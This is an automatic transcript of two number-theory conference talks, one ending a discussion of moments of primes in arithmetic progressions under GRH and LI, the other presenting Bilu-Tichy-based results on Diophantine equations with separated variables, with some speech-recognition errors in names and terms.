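Restating the GRH + LI consequence used above in symbols (my paraphrase of the statement from the talk): if \gamma_1+\cdots+\gamma_n=0 with each \gamma_i the ordinate of a nontrivial zero of some L(s,\chi_i), \chi_i\neq\chi_0, then

\[
n=2m,\qquad \{1,\dots,2m\}=\{i_1,\dots,i_m\}\sqcup\{j_1,\dots,j_m\},\qquad
\gamma_{i_t}=-\gamma_{j_t},\quad \chi_{i_t}=\overline{\chi_{j_t}}\ \ (1\le t\le m),
\]

and in particular every odd moment in the probabilistic model vanishes.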
So we have this relation and this relation. So this means that this is the intersection of these two subsets. We need to see what is satisfied. So I begin by this set when nu equals mu. This means that you see you have zero coming from the same L function associated to a character of chi nu. And of course, we can gather the zero by two. We can group by two such that the sum of the zero, the sum of the ordinate of the zero, of the two zero is zero. So this means we need that cardinality to be even. Here, so it's a trivial relation. Of course, for mu specs, you have n index j and each subset here are djons. So there is no common element. So the sum of the cardinality is n. And if we have such, so this part means that if we can, for each mu, there exists a new function from mu such that such a set is non-empty. So we have such a relation. And then I will try to explain what happened. So I introduced some extra notation. The capital of theta is the product over all j in the set capital J mu nu. And of course, easy to check that the product, this product when mu equals mu, this product is the principal character. Okay. So what can prove that the main contribution comes from the subset of evolution in my set such that for each mu, there exists only one mu such that this set is non-empty, only one. And I will try to explain you why taking an example. So I take the example r equals, of course, r equals one is nearly trivial. So if we take the character and I wrote such a product, I have some relation between the product, the product of all mu of capital theta mu nu is the principal character. So we have four relations. And you see that in each product, we have the diagonal term, I mean mu equals mu. And this term is the principal character. So I mean we can delete it. And then we see that if we assume three relations, it's easy to get the fourth one. This means that we have three relations, but in one case, we have only two independent relations. The case is if we only assume that if we assume that the capital J of this index is empty sets. Then we only have two relations between the character. So capital theta one two equal capital theta three four equal the principal character. So this means that if we assume that for each mu, there is only one mu such that if we assume here this set is not empty, I mean it's not zero, but empty set, then we will have a minimum of relation. And I mean the less we have the relation, the larger is the contribution. So what we'll take, so of course if we assume, for example, that's a relation, so the index where the capital J set is non-empty is consecutive. So I mean, for example, two times mu minus one, also this is a two. Maybe I can. I can. This is a two. Okay. So if the index is a consecutive, then of course to have such a relation, so we have only our relation and then the number of the character is the FQ plus capital O of one power n minus one time R. Okay. We have our relation between, so we delete one factor FQ by relation. Okay. And then, so we take the subset of my evolution which satisfy my extra condition and then it's easy to see that we can express it at the power of mu of n such a sum and times the value of the two of moments of the normal law. And then we see that such a sum appears because the event n is congruent to m of q when a is among the ready residue, congruent to q is non-independent. Okay. So let's go back to our problem. So we have a summation. And in the summation, we will have this relation that I wrote previously. 
And then, so when we take the summation over such an ordinate of zero, I will have, so of course the ordinate can be, they can be summed with multiplicity. So I wrote the multiplicity and then I need to take a square for the multiplicity. So here the star is written here to say that we avoid multiplicity in this sum. And then what we observe is that this is larger than the sum with the multiplicity but without this factor. I mean it's equivalent to say that this square is larger than the star. So we use such inequality. And then the sum that we find here is around alpha of the square of 4-e-tonsum of eta, so I define, so I define here alpha of the square of the 4-e-tonsum. So now we can see that if you take all these results, you can easily deduce that the moment of probabilistic model is larger than the mu of 2r times the variance power r and the variance is defined here. So with mu of n, the constant here, and alpha times log q power n over pi q power n plus 1. And then we can also prove the same result for odd moment, much more difficult because you know the main contribution is difficult to define. So we have some constant here that is used to define the smaller ceta functions that we find here. But what we need to understand is that we have the variance power 2r plus 1 divided by 2, but times the small factor 1 over square root of 5q. So I mean it means that the odd moment is smaller. So now I switch, so we would like to say what gives the LI hypothesis. So I mean I don't need to assume this hypothesis to get the lower bound, but if I want to know what is the asymptotic size for the model, for the probabilistic model, it's not so easy because we have to sum over all chi which satisfy our relation, but we have the terms that we find for the lower bound is the real asymptotic size of our model. So this means that if we believe to LI, then we succeeded to prove the good lower bound for our moment. So of course in this estimate, we can prove some uniform estimate on n and on r and it's very useful to get some result, for example, to deduce some omega result on our moments. And also on the error term of the estimate that the size of eta xaq is estimated by the contribution of the principal character. So yeah, we also can prove some result when a equal one. Why? Because if a equal one, some value of the character is one, and then we don't need to have a moment of a summation of a, and we can prove the same kind of result, but with the combinatorial aspect, very, very much simpler. Okay, thank you for your attention. Yeah, so thank you very much for the presentation. Thanks. We have time for some short questions. I have seen Gerald Tenenbaum typing. Yes, the type is here on the chat. Can you read it? Question for Regis and Daniel, you restrict the analysis? Yeah, so I can read Gerald's question. So yeah, why are we respecting our sum over zero satisfying extra condition? We can get the good asymptotic. Well, I mean, when we look at the model, it's clear that if we assume hypothesis is Li, we will have the expected size. But so when we look at some depending of Li, I will find it soon. Okay. Yeah, when we look at this summation, you see that our lower bounds assume that this term is very small if the sum is not zero. This means that we need to believe a very strong Li hypothesis because we need to believe that such a sum is not close to zero. We believe that when it's zero, we know how to explain it, but we need to believe that when it's not zero, it's not close to zero. 
So it is much stronger. Maybe there is a short comment from Daniel which explains what you have said. Yes, what Daniel said is that for the probabilistic model, if we assume the LI hypothesis, the set of terms that we discard is empty.
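Schematically, the lower bounds described in this part of the talk have the following shape, where M denotes the centred quantity whose moments over a are taken, \mu_{2r}=(2r)!/(2^{r}r!) are the Gaussian moments, V is the variance whose exact expression (involving \alpha(\eta), \log q and \varphi(q)) I do not reproduce, and the factor \sqrt{\varphi(q)} in the odd case is my reading of the quoted statement; the odd moments are only indicated as being roughly of that size.

\[
\mathbb{E}\bigl[M^{2r}\bigr]\;\ge\;\bigl(\mu_{2r}+o(1)\bigr)V^{\,r},\qquad
\mathbb{E}\bigl[M^{2r+1}\bigr]\;\approx\;\frac{V^{\,r+1/2}}{\sqrt{\varphi(q)}} .
\]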
|
This is the second part of the talk of Daniel Fiorilli. We will explain the proofs of our theorem about the moments of moments of primes in arithmetic progressions.
|
10.5446/53734 (DOI)
|
Thank you very much, and greetings to everyone. First of all, I would like to thank the organizers very much for offering us this possibility. Of course, we all know that the best way to have a math conference is to meet together in a place like Marseille; the second best thing, when this is not possible, is to have a virtual conference. So thank you very much for making the effort for this. The plan of the talk is that after a short introduction I will say a few words about the Bilu-Tichy theorem, and then I will address three topics in which, with some co-authors, I have a few results concerning Diophantine equations in separated variables. Not all of them are connected to the Bilu-Tichy theorem; there are also some results which are effective. So first of all, if you take a Diophantine equation of the shape f(x,y) = 0, where f(x,y) is a polynomial with rational coefficients, then in principle the main question is how, or when, this equation may have finitely or infinitely many solutions. Of course, we know that if f(x,y) is irreducible over Q but not absolutely irreducible, that is, not irreducible over C, then f(x,y) = 0 has only finitely many rational solutions. Denoting by g the genus and by d the number of points at infinity of the plane curve f(x,y) = 0, in 1929 Siegel answered this question quite completely. In principle, his result says that if f(x,y) is absolutely irreducible and g is at least one or d is at least three, then one has only finitely many integer solutions. Siegel's result is very helpful when the polynomials are given explicitly or are of a very special form, but for a long time it was a question whether we can describe all pairs of polynomials f and g for which f(x) = g(y), a special case of the previous equation, the case when the variables are separated (f(x) on the left-hand side, g(y) on the right-hand side), may have infinitely many solutions. Equations with separated variables include many important special cases, many important classes of Diophantine equations, such as superelliptic equations, hyperelliptic equations, the Schinzel-Tijdeman equation, power values in arithmetic progressions, power values of sums of k-th powers, equal values of lacunary polynomials, and several other classical and important Diophantine questions. Now, the question of describing all pairs of polynomials such that the equation f(x) = g(y) has infinitely many solutions has been solved by Bilu and Tichy; this is a widely known and appreciated theorem which became a very important tool in Diophantine number theory. They proved that if f and g are non-constant polynomials with rational coefficients, then the following two statements are equivalent. Equation (2) has infinitely many solutions in rational numbers with a bounded denominator; in principle this is a kind of generalization of searching for integer solutions. This statement is equivalent to the fact that f is a composition of three polynomials and g is again a composition of three polynomials, where the inner polynomials are linear, the middle polynomials form a so-called standard pair (on the next slide I will show how they look), and phi is just a polynomial with rational coefficients; it also has to be assumed that the equation f_1(x) = g_1(y) for the standard pair has infinitely many solutions in rationals with a bounded denominator.
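In symbols, the statement just described (the Bilu-Tichy theorem, as I transcribe it): for non-constant f, g in Q[x], the equation f(x) = g(y) has infinitely many rational solutions with a bounded denominator if and only if

\[
f=\varphi\circ f_1\circ\lambda,\qquad g=\varphi\circ g_1\circ\mu,
\]

with \lambda,\mu\in\mathbb{Q}[x] linear, \varphi\in\mathbb{Q}[x], and (f_1,g_1) a standard pair over \mathbb{Q} such that f_1(x)=g_1(y) itself has infinitely many rational solutions with a bounded denominator.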
So in principle this is a very concise description of all the cases in which it is possible that this equation does have infinitely many solutions and there are the possible pairs for G and f or f and G of course in perpetuating the order doesn't make any difference. So there are five types of polynomials. The first type of polynomials look like x to the power q and in this product afterwards the second type is x squared and alpha x squared plus beta times vx squared where here alpha beta are nonzero rational numbers and the third types of and fourth type of pairs are defined using the big sum polynomials and finally there is a fifth pair where there are not many restrictions of the parameters. So these are the possibilities. Since this is a very concise and precise description of all the situations and there might be infinitely many solutions the ability to CRM became a widely used tool for proving finiteness of number of solutions in the case of the ofantian equations. I cannot list all or nearly all or not even the all the important results where the ability CRM has been used but I just show a few instances of the use of them maybe some of which I knew without searching for them. So Peter Pinter and Schindsel and later Schindsel alone applied the theory for separable equations in trinomials. Stoll and he investigated the problem for general makes and the crutch to polynomials. Bill Brinsock in Scherhofer Pinter and he used it for Bernoulli polynomials, Kresho for lacunary polynomials, Dubis Ketten Kresho for truncated binomial powers, Rokowski for polynomial values of power sums and Kulkarnian for polynomial values of products of consecutive numbers. So to start to present some results first of all let us define the sum of products of consecutive integers in principle this is a polynomial which is defined by the sum of the product of terms like x plus j so if we start to look at the first such polynomial f0 of x that's nothing else just x. f1 of x is x plus x times x plus 1. f2 of x will be x plus x times x plus 1 plus x times x plus 1 times x plus 2 and so on. So in principle what is clear from the definition is nothing else that f of x is a monic polynomial. Then it has positive integer coefficients. Its degree is k plus 1 and well as we see it is also visible from this that 0 and minus 2 will be always the root of this polynomial. These polynomials first were introduced as far as I know by Kojula, Estroman, Tenghe who proved that the the of Fanta, who considered the the of Fanta equation fk of x equals y to the n and they proved effective finiteness result for that. They even solved completely the equation when one smaller or equal to k smaller or equal to n and to do so they needed a few more involved properties of these polynomials. So about the fk of x here are the first few polynomials and if k is larger or equal to 3 then all the roots of the polynomial fk of x are real and simple. So the only case when there is a double root is here in f2 of x. 0 is always a root and minus 2 is always a root of the polynomial and a more precise description of the root structure of fk of x is here. These are the intervals where fk of x does have a root. So in principle each root can be can be put in an interval of at length most well 1.5 but generally 1. So it is very well described where are the roots of this polynomial. 
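Written out: the polynomial defined above, together with the Dickson polynomials from which the third and fourth families of standard pairs are built ("big sum polynomials" in the transcription almost certainly means Dickson polynomials, an identification on my part):

\[
f_k(x)\;=\;\sum_{i=0}^{k}\,\prod_{j=0}^{i}(x+j)\;=\;x+x(x+1)+\cdots+x(x+1)\cdots(x+k),
\]
a monic polynomial of degree k+1 with f_k(0)=f_k(-2)=0 for k\ge1, and
\[
D_m\!\Bigl(z+\frac{a}{z},\,a\Bigr)\;=\;z^{m}+\Bigl(\frac{a}{z}\Bigr)^{m}.
\]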
Okay so for our generalization of the result of Hore-Gula instrument Tangae we needed some properties of the polynomials fk of x plus 1 and f derivative of fk derivative of x sorry from here the case missing. So if k is larger or equal to 3 then all the roots of fk of x plus 1 are real and simple. That's one property which we will use later. Minus 1 is always a root of the polynomial fk of x plus 1 for all k larger or equal to 2. Again for k larger or equal to 2 we can describe where the roots of this polynomial fk x plus 1 beside. One of them is in the interval minus k minus 1 minus k the next one in minus k minus k plus 1 and so on. At 2 minus 3 minus 2 and finally there is one root in the interval minus 0.50. So for k larger or equal to 3 if we consider the derivative of such a polynomial then we can denote the roots by alpha 1 alpha 2 and so on. All these roots are real and simple so it will have exactly k roots. If k is larger or equal to 6 then we can prove that fk derivative is 0 is positive, fk derivative in the value minus 1 gives a negative value and so on. And for k larger or equal to 13 we just have fk alpha 1 is larger than fk alpha 3 is larger than fk alpha 5 and fk alpha 2 is larger than fk alpha 4. These are properties which we needed in the proofs of our results. Among the first results I will mention that fk of x is in the composable. So let us see what we mean by a polynomial being in the composable. By the composition of a polynomial f of x over a field k we mean that it is written as a composite function of two polynomial functions. So it is of the form g1 of g2 of x where g1 and g2 are both polynomials over the same field. And we say that such a decomposition is non-trivial if the degree of both these polynomial g1 and g2 is larger than 1. So if none of the polynomials g1 and g2 is linear. If we have two decompositions we say that these decompositions are equivalent. If there exists a linear polynomial with coefficients in the field k such that g1 can be expressed by h1 in the variable Lx and h2 of x is L of g2 of x. We will say that the polynomial f of x is decomposable over k if it has at least one non-trivial decomposition otherwise it is called indecomposable. And what we proved together with Vashu, Haidler and Luka was that the polynomial fk of x is indecomposable over the complex field for any k larger or equal to zero. To prove this we had two very nice tools, two lemmas of the yellow line usage. They proved that if fx is a polynomial with integer coefficients which is monic and it is decomposable over the complex field then there exists also decomposition over z. Further they also proved that if we have a polynomial f of x which is monic and has integer coefficients then in the case of any decomposition f of x equals gh of x the outer polynomial the degree of the outer polynomial is such that its degree is smaller or equal to the gcd of the second coefficient and the degree of the polynomial. So whenever we have a decomposition the outer polynomial is of degree less than the gcd of this coefficient and n the degree of the polynomial. This means that the gcd of a and n if this is co-prime then m is smaller or equal to one that means that if a and n are co-prime then any decomposition is with degree of g equals one which means that f is in decomposable so any decomposition would be a trivial decomposition. So let us see how can we use this for proving that fk of x is in decomposable. First of all let us see how fk of x looks like. 
We know that fk of x has degree k plus one it is monic so we just denote its coefficient by one ck minus one and so on c1 and we know that zero is a root of fk of x so c0 must be zero. It is not very hard I would say it is very easy to compute ck which is one plus k times k plus one over two. Now if you take a look at it this when k is even then this is k plus one times an integer if I add one that is co-prime to k plus one so in this case by the CRM of Duiola and Goussic fk of x is in decomposable this is the easy case when k is odd then we have to do a little bit more computations in this case we see that k plus one and ck has a gcd which is at most two. Well of course in the case when the degree of the outer polynomial if fk of x equals h of g of x if the degree of the outer polynomial is one that's a trivial decomposition so it doesn't count so the only way we may have a non-trivial decomposition is the degree of h is two because the degree of the outer polynomial the external polynomial must be smaller or equal to two. So assume that we have a quadratic polynomial h equals ax square plus bx plus c. Now then h of g of x looks like this and clearly now this is the decomposition of the polynomial fk of x but by the CRM of Duiola and Goussic we know that if it has a decomposition over the complex numbers it has a decomposition over the integers so we may assume without loss of generality that abc are integers and g is a polynomial with integer coefficients. From this it is easy to see that a must be equal to one because f has leading coefficient one so this means that a times the square of the leading coefficient of g must be one. All are integers so a must be one. This means that if you and we are the polynomial are the roots of the polynomial h the quadratic polynomial ax square or now x square plus bx plus c then fk of x can be written like g of x minus u times g of x minus v but we know that fk of zero is zero so either one or the other factor must be zero so we get g zero equals u or g zero equals v which now shows that either u or v is integer but now we have a quadratic equation if one of the roots is integer then the other one must be integers so both you and we are integers. So we may just denote gx minus u by h and then we know that gx minus v will be h of x plus d where d is u minus v but what is important then this d is an integer. So now we have fk of x equals h times h plus d and let us use the property of fk of x that fk of minus one is minus one that means that h minus one times h of minus one plus d they give minus one so since h of x and h of x plus d are integers then h of minus one equals plus or minus one and h of minus one plus d equals plus or minus one consequently we obtain d equals zero or d equals plus or minus two but d equals zero would mean that fk of x is h of x to d square but this contradicts that all the roots of f of x fk of x are simple roots and when we have d equals plus or minus two then we get that fk of x plus one will be a square but again we have proved that fk of x plus one has only simple roots which gives again a contradiction so all together fk of x is incomposable. This CRM was used to prove the second part of the following more general result let g of x be a polynomial with rational coefficients and consider the the of anti-inequation fk of x equals g of y so now the right hand side is an arbitrary polynomial and on the left hand side we do have this polynomial which is the sum of products of consecutive integers. 
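Before the conclusions of the theorem being stated next, here is a quick computational sanity check of the facts about f_k used in the indecomposability argument above (monic, degree k+1, roots at 0 and -2, second coefficient c_k = 1 + k(k+1)/2); a small sympy sketch of my own, not the authors' code:

import sympy as sp

x = sp.symbols('x')

def f(k):
    # f_k(x) = sum_{i=0}^{k} prod_{j=0}^{i} (x + j)
    total, term = sp.Integer(0), sp.Integer(1)
    for i in range(k + 1):
        term *= (x + i)
        total += term
    return sp.expand(total)

for k in range(2, 9):
    p = sp.Poly(f(k), x)
    coeffs = p.all_coeffs()                    # leading coefficient first
    assert p.degree() == k + 1                 # degree k + 1
    assert coeffs[0] == 1                      # monic
    assert f(k).subs(x, 0) == 0                # 0 is a root
    assert f(k).subs(x, -2) == 0               # -2 is a root
    assert coeffs[1] == 1 + k * (k + 1) // 2   # c_k = 1 + k(k+1)/2
print("all checks passed")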
Assume that k is larger or equal to three then in the case when the degree of the polynomial g is zero or two then there exists an effectively computable constant depending only on this index k and the polynomial g such that the maximum absolute value of the integer solutions of equation four is bounded by this constant so we can prove an effective finiteness CRM in this case whenever the degree of g is larger or equal to three then we can prove that equation four has only finitely many integer solution unless we have g of x equals fk h of x clearly in this case there will be infinitely many solutions so in the case of g equals zero or two we have effective finiteness and in the case of g larger or equal to three we do have ineffective finiteness here in the second point the finiteness is ineffective because we are using the bilou tihi criterion the bilou tihi CRM and since the bilou tihi CRM is ineffective the results proved by it will also be effective result this means that there are no bounds on the size of the solutions it proves a finiteness where there is no guaranteed that there is a bound we cannot just produce an effective upper bound well what about the cases which are excluded first of all whenever g of x equals fk of h of x then clearly we may have infinitely many solutions also when the degree of g equals one we may have infinitely many solutions well it is clear whenever g is linear then this might have infinitely many solutions let's say if g of y equals y then we just have fk of x equals an integer and if y is that integer that's a solution so for every x we get a solution y again when g of x is fk of h of x the same situation holds whenever h of x assumes a value then we can take for let's say for y or for the other unknown this value and we get a solution so in this case is we always have infinitely many solutions and it may happen also for k smaller or equal to two at the beginning of the CRM we assume k is larger or equal to three well when k is smaller or equal to two it may happen that there are infinitely many solutions these conditions are necessary now in case of our CRM now a few words about the proof of statement two I will not tell anything about the proof of the first statement but about the second statement where we use the ability CRM I would like to sketch the main ideas of the proof so it is this part of the CRM so as in the CRM we assume that k is larger or equal to three and the g is a polynomial with rational coefficients of degree at least three and we assume that this equation has infinitely many solutions now let us see what can be inferred from that the ability CRM describes very explicitly what situation this can happen fk of x must be phi of f of lambda of x and g must be phi of g of k of x the phi here is the same polynomial lambda and kappa they are linear polynomials and f and g are coming from a standard pair over q now we know we have proved a few slides before that fk of x is indecomposable so that means that the degree of this phi is either one or it is k plus one if it's one then of course f must be of degree k plus one otherwise f will be linear so let us see the two cases we will address first the case when degree of phi of x equals k plus one we just recall that this is how fk and g of x are composed now from this composition we see that the degree of f must be one because this is of degree k plus one phi is of degree k plus one so f must be linear but then clearly we have fk of x equals phi t of x where t of x is f lambda of x it's 
linear now we can take the inverse function of the polynomial function t of x so that t of t minus one gives the identity function so this means that fk of t minus x is just phi of x so we can express phi of x in the form fk of something which is linear now if we go to the other part of the or other polynomial g of x g of x is composed like phi of g of tappa of x but phi can be written like fk of t minus one and now you see that this is fk of something and in principle we don't care what is here inside the only important feature is that it is a polynomial with rational coefficients and of degree at least one so this means that we can prove that g of x equals fk of h of x this is the exceptional case when we may have infinitely many solutions and we will see that there are no other possibilities for infinitely many solutions since the other possibility is when the degree of phi of x equals one whenever the degree of phi of x equals one we can write phi of x like this and in this case we have to study all the possible standard pairs now we have five kinds of standard pairs in the case of standard pairs of type two this can be excluded because there we have a polynomial of degree two but f of x and g of x cannot be of degree two in this case because f of x must be of degree k plus one if i go back here now phi is linear lambda is linear so in order to get the polynomial of degree k plus one f must be of degree k plus one it cannot be quadratic polynomial so on the other hand the other polynomial let me just come back for a second here to the second type standard pairs so one of them must be x square and the other one must be of this shape but here it's clear that this polynomial has multiple roots whenever the degree is larger than two or larger than larger equal to four sorry so in that case again we see that it has multiple roots but f k of x cannot have multiple roots so this way we can exclude polynomials of pairs of polynomials of type two standard pairs of type two standard pairs of certain force kind they are the polynomials which are defined using with some polynomials we can exclude them by comparing coefficients in this equation in the case of standard pairs of type five in principle we have two cases f k of x must be either of this shape which contradicts with the in the composibility of f if we look at this then this shows that there is a polynomial eight times lambda x square minus one to the cube but this means that this polynomial is composed to phi x cube plus phi one x cube plus phi zero so this is a non-trivial composition of polynomials f k cannot be of this shape on the other hand we may have f k of x equals this shape and in this case we just compare again coefficients and after comparing three four coefficients we get a contradiction in the case of the first type again the root structure of f k of x and the derivative of f k of x prove that such standard pairs are impossible well of course here we have some lengthier computation which I have no time to to show for these situations but this is the flavor of the of the proof we also proved an effective result in the case of the equation f k of x equals a y to the n plus b we could prove that the solutions are bounded by an effectively computable constant and well this is a generalization of the result of Hoidl-Lichram and Tange who considered the case a equals one and b equals zero now we will switch our attention to a different topic. 
Comornic polynomials are polynomials introduced by Riemann-Kommornig for some results concerning digital expansions and if we define a sub n of x equals x to the power two times three to the power n minus x to the power three to the n minus one and we multiply such polynomials from k equals zero to n then we get the n's Komornig polynomial. Komornig polynomials the first few of them look like this the first one is easy to see but the second one and the third one are these polynomials so we can see that these are polynomials with coefficients plus or minus one and there are the degree of this of such polynomials is always c to the power n plus one minus one. All coefficients are plus or minus one below the highest degree term below the main term there are no other coefficients than plus or minus one including zero there is no zero coefficient so all the terms are present it consists of c to the power n plus one monomials and all these monomials have coefficients either plus one or minus one. It is also proved that all the complex roots of such polynomials are simple. The first important result concerning Komornig polynomials is that Komornig polynomials are incomposable over c and this helps us to use this for to apply the B-Lutih C-R-M later but for the moment let us see a few more properties of a k of x. In principle there is a polynomial identity a l plus k of x equals a of a sub l of x to the power three to the power k and if we denote the Fibonacci numbers but by phi zero, pi one and so on and we define f sub k to be phi of three to the power k plus one plus phi of three to the k minus one minus one then these are clearly integer numbers these integer numbers will play an important role in the GCD of two values of this polynomial a k of x. So if we take the polynomial a k of x in any integer space and we compute it for the index l and for the index l plus k then the GCD of these two integers will divide the integer a sub k defined just here using the Fibonacci numbers. So this way for polynomials with index close to each other we can compute the GCD or we can prove how much is the GCD if they are consecutive in this is k and k plus one then the GCD will always be one and if between the indexes between the indices the difference is two then the GCD is either one or five. So after these auxiliary properties let us show about show the results concerning the of anti-equations containing Pomornik polynomials the problem originates from Atilla Petu who asked in a conference about the finiteness of number of solutions of e sub n of x equals e sub n of y. With Kolushpink and Schustek we did prove that the equation p sub n of x equals p sub m of y has always finitely many integer solutions and even more general we consider the equation with arbitrary right hand side and we did prove that if g of x is not of the form p sub n of h of x or g of x is not of the form gamma of delta x to the l where gamma and delta are linear polynomials directional coefficients and l is just the degree of this polynomial g then we have only finitely many solutions. However I have to mention that the first exception that's necessary the second exception we couldn't prove that in this case there are infinitely many solutions so it may it probably may be excluded but we were just unable to prove that. Well that was what it was written here and of course since we use BDT-CRM the result is ineffective. 
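For reference, the definition given at the start of this part, written out (my reconstruction from the spoken description; the degree count quoted above follows from it):

\[
a_n(x)\;=\;x^{2\cdot3^{n}}-x^{3^{n}}-1,\qquad
P_n(x)\;=\;\prod_{k=0}^{n}a_k(x),\qquad
\deg P_n=\sum_{k=0}^{n}2\cdot3^{k}=3^{\,n+1}-1 .
\]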
We also did prove some results concerning this polynomial which are effective in the case of the equation p of n of x equals y to the m. We did get effective solutions both in the case m equals to or m larger would be equal to 3 and we even could prove an effective result but for the exponent m from here whenever y is different of plus or minus one and for the concrete cases of y square in the right hand side we did solve completely this equation there are some trivial solutions and except of the trivial solutions it exists only one non-trivial solution in the case when n equals 2 and we did solve the equation also for n equals 1, 2, 3, 4 and 5. Further we did prove we did solve completely the equation p of n of x equals y cube for n equals 0, 1, 2 and 3. As my time is going I will not tell about these results in details however I will switch to my third topic power values of power sums. Well if you take s k of x 1 to the k plus 2 to the k plus x to the k this is s k of x and the problem s k of x equals y to the n this is a well-known and much-investigated classical problem it goes back to Luca Watson and the first international known base through was you to check for could prove that if k and n is not one of these pairs then this equation 16 has only 590 many solutions. He also conjectured that if k and n are not k and is not of this pair not not one of these pairs then the only non-trivial solution is given by 2, 2, 24 and 70. Many results concerning this equation have been established during the last few decades. Yuri Tiedemann and Forkhoof proved an effective version of Schaeffer and they have another extra feature that also n was an unknown so in this equation also the exponent was an unknown for them and the effective finiteness was working also in this more general case. Then Pinter proved that for non-trivial solutions we have this bound and the conjecture was verified by Jacobson Pinter and Walsh for some bounded values of k and n equals 2. Benadio and Pinter extended the result to one smaller or equal to k smaller or equal to 11 and arbitrary and larger or equal to 2. This was again an important breakthrough and Pinter verified the conjecture for and larger than 4 and one smaller or equal to k smaller than 107. This is of course not a complete list of results. However, how do we initiate the investigation of this equation for fixed values of x? For values of x which are smaller than 25 and are congruent of 0 and 3 mod 4, he computed all the solutions and together with Koidu Mierzak and Inc. we extended this result for the cases when k is congruent to one or two mod 4. In principle this shows that we proved the Schaeffer conjecture for x smaller than 25 and larger or equal to 3. Now finally I would like to mention few other kinds of equations where S k of x is included and the Bielow-Tihe CRM is used, but these results are not mine. I couldn't contribute to this topic. Bielow-Grinsow-Kinscher Hofer-Pieter and Tihe consider the equation S k of x equals SM of y and for the case when Geofi is the product of consecutive integers Bielow-Binser Hofer-Pieter and Tihe proved again, then Jürj Kovac, Peter and Inter for binomial coefficients and for this kind of sums Jürj Kovac, Peter and Inter. So also for such kind of separable equations Bielow-Tihe CRM was used and it was a powerful tool. Thank you very much for your attention. This was what I wanted to tell. Yeah so thank you very much Attila for your very nice and rich talk. 
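The single non-trivial solution (k, n, x, y) = (2, 2, 24, 70) in Schäffer's conjecture mentioned above is the classical "cannonball" identity; a tiny check (my own Python snippet):

# 1^2 + 2^2 + ... + 24^2 = 4900 = 70^2
total = sum(i * i for i in range(1, 25))
assert total == 70 ** 2
print(total)  # 4900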
So it is open for discussion, and I can already see a very precise question from Gary Walsh, who is our next speaker. So the question, you can read it here; is it possible to read it? Just a second, I am trying to find it. He is asking where the upper bounds on page 28 come from. On page 28; a very precise question. Page 28, let me just find it... oh no, I'm sorry, no, it's 20... oh yes, 28. I see. Well, these come from superelliptic and hyperelliptic equations, from Baker's theory, from a result of Jahn de Kewer, Czekalman, Jürj and myself. We have a completely explicit result for this case, and we use that theorem here.
|
A Diophantine equation has separated variables if it is of the form f(x)=g(y) for polynomials f, g. In a more general sense the degrees of f and g may also be variable. In the present talk various results for special types of the polynomials f and g will be presented. The types of polynomials considered include power sums, sums of products of consecutive integers, Komornik polynomials, and perfect powers. Results on F-Diophantine sets, which are proved using results on Diophantine equations in separated variables, will also be considered. The main tool for the proof of the presented general qualitative results is the famous Bilu-Tichy Theorem. Further, effective results (which depend on Baker's method) and results containing the complete solutions to special cases of these equations will also be included.
|